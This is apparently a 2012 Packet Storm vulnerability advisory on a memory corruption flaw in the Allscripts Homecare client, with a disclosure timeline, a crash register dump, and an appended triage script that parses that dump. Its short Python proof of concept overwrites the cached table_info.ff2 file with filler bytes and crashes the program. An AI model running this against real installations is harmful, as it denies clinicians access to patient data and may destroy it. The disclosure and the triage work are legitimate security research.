Allscripts Homecare Client Local Memory Corruption

2012-10-26T00:00:00
ID PACKETSTORM:117708
Type packetstorm
Reporter G13
Modified 2012-10-26T00:00:00

Description

                                        
                                            `# Title: Allscripts Homecare Client Local Memory Corruption table_info.ff2  
# Date: 10/25/12  
# Author: G13  
# Software Link: http://www.allscripts.com/en/solutions/post-acute-solutions/homecare/show/overview.html  
# Version: 6.1.0, 7.0.1  
# Category: Application (local)  
# Tested on: Windows 7 Pro 64 Bit  
# dc585  
  
###### Introduction ######  
  
Allscripts Homecare is an industry leading home care system designed  
to improve clinical quality of care, financial  
performance, and operational control for large, integrated home care  
organizations and small home care companies.  
Business, clinical, and scheduling functionality for multiple lines of  
business—home health, hospice, and private  
duty are combined seamlessly in one integrated home care software system.  
  
###### Report Timeline ######  
  
12/22/11 - Discovery  
01/12/12 - Vendor Notification  
10/25/12 - Disclosure  
  
###### Exploit Technique ######  
  
Local  
  
###### Details ######  
  
A memory corruption vulnerability was detected in Allscripts Homecare  
6.1.0. Processing a corrupt .ff2 file in the program's cache causes an  
access violation. The specific file is table_info.ff2. The cache for  
this program is where a local copy of patient and system data is stored  
and made accessible to users. Corrupting this file will deny users  
access to the program and may cause a loss of data.  
  
Other versions are possibly affected.  
  
###### Exception Log ######  
  
EAX 00000000  
ECX 00184646  
EDX 41414141  
EBX 006E994F MHC.006E994F  
ESP 0018F244  
EBP 0018F284  
ESI 006E994F MHC.006E994F  
EDI 00000000  
EIP 004040AF MHC.004040AF  
C 0 ES 002B 32bit 0(FFFFFFFF)  
P 1 CS 0023 32bit 0(FFFFFFFF)  
A 0 SS 002B 32bit 0(FFFFFFFF)  
Z 0 DS 002B 32bit 0(FFFFFFFF)  
S 0 FS 0053 32bit FFFDD000(FFF)  
T 0 GS 002B 32bit 0(FFFFFFFF)  
D 0  
O 0 LastErr ERROR_COMMITMENT_LIMIT (000005AF)  
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)  
ST0 empty 0.0  
ST1 empty 0.0  
ST2 empty 0.0  
ST3 empty %#.19L  
ST4 empty 0.0  
ST5 empty 0.0  
ST6 empty 0.0  
ST7 empty %#.19L  
3 2 1 0 E S P U O Z D I  
FST 1020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)  
FCW 137F Prec NEAR,64 Mask 1 1 1 1 1 1  
  
  
###### PoC ######  
  
#!/usr/bin/python  
  
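# Overwrite the client's cached table_info.ff2 with filler bytes.  
# Raw string so that "\t" in "\table_info.ff2" is not read as a tab.  
f = open(r'c:\program files (x86)\misys\homecare\client\cache\table_info.ff2', 'w')  
f.write('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')  
f.close()  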
  
  
`
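Added example (not part of the original advisory): a short Python triage script that parses the general-purpose registers from the Exception Log above and labels each one as null, pointing into a named module, or made of bytes that also occur in the file content the PoC writes. The function names and labels are this example's own; the register values and the filler string are copied from the advisory.

```python
import re

# Register lines copied from the advisory's Exception Log section.
EXCEPTION_LOG = """\
EAX 00000000
ECX 00184646
EDX 41414141
EBX 006E994F MHC.006E994F
ESP 0018F244
EBP 0018F284
ESI 006E994F MHC.006E994F
EDI 00000000
EIP 004040AF MHC.004040AF
"""

# The filler string the PoC writes into table_info.ff2.
PAYLOAD = b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

REG_LINE = re.compile(
    r"^(EAX|ECX|EDX|EBX|ESP|EBP|ESI|EDI|EIP)\s+([0-9A-Fa-f]{8})(?:\s+(\S+))?$"
)

def parse_registers(log):
    """Return {register: (value, symbol or None)} from a debugger register dump."""
    regs = {}
    for line in log.splitlines():
        m = REG_LINE.match(line.strip())
        if m:
            regs[m.group(1)] = (int(m.group(2), 16), m.group(3))
    return regs

def classify(value, symbol, payload):
    """Label one 32-bit register value for crash triage."""
    if value == 0:
        return "null"
    # x86 is little-endian: compare the register's in-memory byte order.
    if value.to_bytes(4, "little") in payload:
        return "file-data"
    if symbol:
        return "module:" + symbol.split(".")[0]
    return "other"

def triage(log, payload):
    """Map each register in the dump to its triage label."""
    return {r: classify(v, s, payload) for r, (v, s) in parse_registers(log).items()}

if __name__ == "__main__":
    for reg, label in triage(EXCEPTION_LOG, PAYLOAD).items():
        print(f"{reg}: {label}")
```

On the advisory's dump this marks EDX as holding file content while EIP still points inside the MHC module, which matches the access violation the Details section describes.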